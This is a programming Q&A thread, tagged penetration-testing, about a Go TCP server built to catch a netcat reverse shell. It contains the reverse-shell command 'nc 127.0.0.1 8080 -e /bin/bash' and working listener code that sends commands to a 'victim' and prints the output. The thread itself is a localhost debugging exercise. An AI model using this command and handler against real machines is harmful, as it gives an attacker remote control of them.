# How do I catch a netcat reverse shell?

Tags: go, server, netcat, penetration-testing

I am working on a TCP server in Go.
The TCP server needs to be able to catch a reverse shell from netcat:

```
$ nc 127.0.0.1 8080 -e /bin/bash
```

I should be able to send commands and receive responses; however, my server just seems to hang when it receives a connection.

I think the problem is with the bufio.NewReader(conn).ReadString('\n') line, but I don't know how to fix it.

Can you offer any solutions, please and thank you?

Server Code (note: error handling omitted for brevity):

```
func main() {
    ln, _ := net.Listen("tcp", "127.0.0.1:8080")
    for {
        conn, _ := ln.Accept()
        handleConn(conn)
    }
}

func handleConn(conn net.Conn) {
    for {
        // Receive data from netcat victim
        data, _ := bufio.NewReader(conn).ReadString('\n')
        fmt.Println(data)

        // Read command from Stdin then send to netcat victim
        reader := bufio.NewReader(os.Stdin)
        cmd, _ := reader.ReadString('\n')
        fmt.Fprintln(conn, cmd)
    }
}
```

Comment: what do you mean by "catch" it?

Comment: Creating and discarding bufio.Readers in the loop is likely to cause a problem because this will discard any buffered data in the readers.  Create the readers outside of the loop.  Also, bufio.Scanner is generally preferred over bufio.Reader when reading lines.

Answer (score 0):

I solved my problem immediately after I posted my question (d'oh!).
Anyways, the solution is simple: reverse the read and write logic.
After that, everything worked as desired.

Here's the fixed code:

```
func handleConn(conn net.Conn) {
    fmt.Println("Connection received.")
    for {
        // Read command from Stdin and send to victim
        reader := bufio.NewReader(os.Stdin)
        cmd, _ := reader.ReadString('\n')
        fmt.Fprintln(conn, cmd)

        // Receive input from connection
        data, _ := bufio.NewReader(conn).ReadString('\n')
        fmt.Println(data)
    }
}
```